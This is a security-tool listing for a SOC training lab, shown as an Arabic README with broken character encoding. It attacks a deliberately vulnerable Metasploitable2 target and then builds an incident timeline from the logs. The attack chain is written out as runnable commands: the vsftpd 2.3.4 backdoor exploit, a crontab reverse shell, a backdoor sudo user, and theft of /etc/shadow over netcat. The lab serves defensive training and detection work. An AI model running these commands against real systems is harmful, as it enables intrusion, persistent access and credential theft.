## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MITHILESHAN-SOC-INVESTIGATION-LAB
# ู
ุฎุชุจุฑ ุชุญูููุงุช SOC ู
ุชูุงู
ู
> ููููุฐ ุณูุณูุฉ ูุฌูู
ูุงู
ูุฉ ู
ู ุฃุฑุจุน ู
ุฑุงุญู (ุงุณุชุทูุงุน โ ุงุณุชุบูุงู โ ุซุจุงุช โ ุชุณุฑูุจ ุจูุงูุงุช) ุถุฏ Metasploitable2ุ ููุฌู
ุน ุงูุฃุฏูุฉ ูู ูู ู
ุฑุญูุฉุ ูููุชุฌ ุฎุทูุง ุฒู
ูููุง ู
ูุธู
ูุง ููุญุงุฏุซ ูุชูุฑูุฑ SOC โ ู
ู
ุง ููุธูุฑ ุงูุชูููุฑ ุงูู
ุชุฒุงู
ู ููู
ูุงุฌู
ูุงูู
ุฏุงูุน.
    
* * *
## ุงููุฏู
ูุฐุง ูู ุงูู
ุดุฑูุน ุงูุฎุชุงู
ู. ูุจููู ุงููุฏุฑุฉ ุนูู:
* ุชูููุฐ ุณูุณูุฉ ูุชู ูุงูุนูุฉ ุถุฏ ูุฏู ู
ุนุฑูุถ ููุงุฎุชุฑุงู ุนู ูุตุฏ
* ุฌู
ุน ุฃุฏูุฉ ุฌูุงุฆูุฉ ูู ูู ู
ุฑุญูุฉ ุจุงุณุชุฎุฏุงู
ู
ุตุงุฏุฑ ุชูููู
ุชุฑู ู
ุชุนุฏุฏุฉ
* ุฑุจุท ุฅุฏุฎุงูุงุช ุงูุณุฌูุงุช ู
ู ุฃูุธู
ุฉ ู
ุชุจุงููุฉ ูู ุฎุท ุฒู
ูู ู
ูุญุฏ ููุญุงุฏุซ
* ุฅุฌุฑุงุก **ุชุญููู ูุฌูุฉ ุงูุฑุคูุฉ** โ ูุชุญุฏูุฏ ู
ุง ูุงู ุณููููููุช _ุฏูู_ ุชุบุทูุฉ ูุดู ู
ูุงุณุจุฉ
* ุฅูุชุงุฌ ุชูุฑูุฑ ุญุงุฏุซ ุจู
ุณุชูู SOC ุจุงูุชูุณูู ุงูู
ุณุชุฎุฏู
ู
ู ูุฑู ุงูุฃู
ู ุงูุญููููุฉ
ุงูุงุณุชุบูุงู ุงูู
ุณุชุฎุฏู
(CVE-2011-2523 โ ุงูุจุงุจ ุงูุฎููู ูู vsftpd 2.3.4) ุฐู ุฃูู
ูุฉ ุชุงุฑูุฎูุฉ: ููุฏ ูุงู ูุฌูู
ูุง ุนูู ุณูุณูุฉ ุงูุชูุฑูุฏ ุญูุซ ุญูู ุฎุตู
ุจุงุจูุง ุฎููููุง ูู ู
ุณุชูุฏุน ุงูู
ุตุฏุฑ ุงูู
ูุชูุญ ูุญุฒู
ุฉ vsftpd.
* * *
## ุงูุจููุฉ ุงูู
ุนู
ุงุฑูุฉ
root@kitploit:~
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ soc-lab (172.23.0.0/24) โ
โ โ
โโโโโโโโโโโโโโโ โ โโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ Attacker โ โ โ Metasploitable2 โ โ
โ Kali Linux โ โ โ 172.23.0.200 โ โ
โ โ โ โ โ โ
โ Phase 1 โโโโโโโซโโบโ :21 vsftpd 2.3.4 โโโโโซโโโซโโ CVE-2011-2523
โ nmap -A โ โ โ :22 SSH โ โ backdoor on :6200
โ โ โ โ :80 HTTP (DVWA) โ โ
โ Phase 2 โโโโโโโซโโบโ :445 Samba โ โ
โ msf exploitโโโโโโโซโโโ :6200 root shell โ โ
โ โ โ โโโโโโโโโโโโโโโโโโโโโโโโโโโ โ
โ Phase 3 โโโโโโโซโโบ useradd sysbackup โ
โ persistenceโโโโโโโซโโบ crontab reverse shell โ
โ โ โ โ
โ Phase 4 โโโโโโโซโโ /etc/shadow via nc :5555 โ
โ exfiltration โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโฌโโโโโโโ
โ
โ Evidence collection:
โ logs/msf_session.log
โ logs/target_auth.log
โ captures/full_attack_chain.pcap (tshark CSV)
โผ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ build_timeline.py โ
โ Parser: MSF log + auth.log + tshark CSV โ
โ โ merge by timestamp โ tag by phase โ
โ โ JSON timeline + Markdown incident report โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
* * *
## ุงูุฃุฏูุงุช ูุงูุชูููุงุช
* * *
## ุงูุฅุนุฏุงุฏ
root@kitploit:~
cd docker/
# Start Metasploitable2 (isolated network)
docker compose up -d metasploitable
# Verify target is reachable
nmap -p 21,22,80 172.23.0.200
# Start background packet capture
sudo tcpdump -i eth0 host 172.23.0.200 \
-w captures/full_attack_chain.pcap &
* * *
## ุทุฑููุฉ ุงูุชุดุบูู (ุณูุณูุฉ ุงููุฌูู
)
### ุงูู
ุฑุญูุฉ 1 โ ุงูุงุณุชุทูุงุน
root@kitploit:~
nmap -sV -O -A \
-p 21,22,80,139,445,3306,5432 \
--script=banner,ftp-anon,http-title \
-oX logs/recon_scan.xml \
172.23.0.200
**ุงููุชูุฌุฉ ุงูุฑุฆูุณูุฉ** : `21/tcp open ftp vsftpd 2.3.4`
### ุงูู
ุฑุญูุฉ 2 โ ุงูุงุณุชุบูุงู (CVE-2011-2523)
root@kitploit:~
# Method A: Metasploit
msfconsole -q -x "
use exploit/unix/ftp/vsftpd_234_backdoor;
set RHOSTS 172.23.0.200;
set PAYLOAD cmd/unix/interact;
run" | tee logs/msf_session.log
# Method B: Manual (demonstrates the mechanism)
# Step 1: Trigger backdoor by sending username with ':)'
printf "USER evil:)\r\nPASS x\r\n" | nc 172.23.0.200 21
# Step 2: Connect to spawned root shell
nc 172.23.0.200 6200
# โ id: uid=0(root) gid=0(root)
**ูู
ุงุฐุง ูุนู
ู ูุฐุง** : ุนูุฏู
ุง ูุชููู vsftpd 2.3.4 ุงุณู
ู
ุณุชุฎุฏู
ูุญุชูู ุนูู ุงูุณูุณูุฉ ุงููุฑุนูุฉ `:)`ุ ููููุฐ ุงูุจุฑูุงู
ุฌ ุงูุฎูู `execl("/bin/sh",...)` ู
ุฑุจูุทูุง ุจู
ููุฐ TCP 6200. ูุง ุญุงุฌุฉ ููู
ุตุงุฏูุฉ โ ุบูุงู ุฌุฐุฑ ู
ุจุงุดุฑ.
### ุงูู
ุฑุญูุฉ 3 โ ุงูุซุจุงุช
root@kitploit:~
# Execute in the root shell on target:
useradd -m -s /bin/bash sysbackup
echo "sysbackup:$(openssl passwd -1 secr3t)" >> /etc/passwd
echo "sysbackup ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
(crontab -l 2>/dev/null; echo "* * * * * bash -i >& /dev/tcp/172.23.0.1/9999 0>&1") | crontab -
### ุงูู
ุฑุญูุฉ 4 โ ุชุณุฑูุจ ุงูุจูุงูุงุช
root@kitploit:~
# Receiver (attacker)
nc -lvnp 5555 > samples/exfiltrated_shadow.txt
# Sender (on target)
cat /etc/shadow | nc 172.23.0.1 5555
### ุจูุงุก ุงูุฎุท ุงูุฒู
ูู ููุญุงุฏุซ
root@kitploit:~
# Convert PCAP to CSV first
bash ../02-network-recon-detection/src/pcap_to_siem.sh captures/full_attack_chain.pcap
# Build timeline from all sources
python3 src/build_timeline.py \
--msf-log logs/msf_session.log \
--auth-log logs/target_auth.log \
--pcap-csv captures/full_attack_chain_packets.csv \
--output-json samples/timeline.json \
--output-md docs/incident_report.md \
--pretty
* * *
## ูู
ูุฐุฌ ุงูุฅุฎุฑุงุฌ
### ู
ุฎุฑุฌุงุช `build_timeline.py` ุนูู stderr
root@kitploit:~
2026-04-24T16:05:20 [INFO ] Parsed 9 events from MSF log
2026-04-24T16:05:20 [INFO ] Parsed 11 events from auth.log
2026-04-24T16:05:20 [INFO ] Parsed 4 flow-initiation events from PCAP CSV
2026-04-24T16:05:20 [INFO ] Total events (sorted): 24
2026-04-24T16:05:20 [INFO ] Unique IOCs extracted: 4
2026-04-24T16:05:20 [INFO ] Phase RECON : 8 event(s)
2026-04-24T16:05:20 [INFO ] Phase EXPLOIT : 4 event(s)
2026-04-24T16:05:20 [INFO ] Phase PERSIST : 6 event(s)
2026-04-24T16:05:20 [INFO ] Phase EXFIL : 2 event(s)
### ุงูุฎุท ุงูุฒู
ูู ููุญุงุฏุซ (ู
ูุชุทู ู
ู `samples/sample_timeline.json`)
root@kitploit:~
{
"total_events": 24,
"iocs": [
{ "indicator": "172.23.0.1", "phase": "RECON", "occurrence": 8 },
{ "indicator": "172.23.0.1", "phase": "EXPLOIT", "occurrence": 2 },
{ "indicator": "sysbackup", "phase": "PERSIST", "occurrence": 1 }
],
"timeline": [
{ "timestamp": "2026-04-24T14:10:05+00:00", "phase": "RECON", "description": "nmap -sV -O -A", "source": "metasploit" },
{ "timestamp": "2026-04-24T14:22:41+00:00", "phase": "EXPLOIT", "description": "session 1 opened (172.23.0.1 โ 172.23.0.200)", "source": "metasploit" },
{ "timestamp": "2026-04-24T14:28:07+00:00", "phase": "PERSIST", "description": "useradd: new user: name=sysbackup", "source": "auth_log" },
{ "timestamp": "2026-04-24T14:35:52+00:00", "phase": "EXFIL", "description": "flow 172.23.0.200 โ 172.23.0.1:5555", "source": "pcap" }
]
}
* * *
## ุชุญููู ูุฌูุฉ ุงูุฑุคูุฉ
ูุฐุง ูู ุฃูู
ู
ุฎุฑุฌ ุชุญูููู โ ู
ุง ูุงู ุณููููููุช _ุฏูู_ ูุดู ู
ูุงุณุจ.
**ุงููุชูุฌุฉ ุงูุญุฑุฌุฉ** : ูุง ูุชุฑู ุงุณุชุบูุงู vsftpd 2.3.4 **ุฃู ุฅุฏุฎุงู ูู auth.log** ูุฃูู ูุชุฌุงูุฒ ูุธุงู
ุชุณุฌูู ุงูุฏุฎูู. ุงูุฏููู ุงููุญูุฏ ูู ุงูุณุฌูุงุช ูู ุงุชุตุงู TCP ุงููุงุญู ุจุงูู
ููุฐ 6200 โ ุบูุฑ ู
ุฑุฆู ุฏูู ุชูููู
ุชุฑู ุงูุดุจูุฉ. ูุง ูู
ูู ูุณุฌูุงุช ููุงุท ุงูููุงูุฉ ูุญุฏูุง ุงูุชุดุงู ูุฐู ุงููุฆุฉ ู
ู ุงููุฌู
ุงุช.
* * *
## ุงููููุฏ ูุงูุนู
ู ุงูู
ุณุชูุจูู
* * *
## ุงูู
ุฑุงุฌุน
* * *
## ูููู ุงูู
ุดุฑูุน
root@kitploit:~
04-soc-investigation/
โโโ src/
โ โโโ build_timeline.py # Multi-source log merger + phase tagger
โ โโโ run_attack_chain.sh # Step-by-step attack chain with exact commands
โโโ configs/
โ โโโ splunk_detection_rules.spl # Phase-specific SPL queries (RECON/EXPLOIT/PERSIST/EXFIL)
โโโ samples/
โ โโโ sample_timeline.json # Example incident timeline JSON
โโโ docker/
โ โโโ docker-compose.yml # Metasploitable2 isolated target
โโโ docs/
โ โโโ incident_report.md # Generated SOC report (build_timeline.py --output-md)
โโโ screenshots/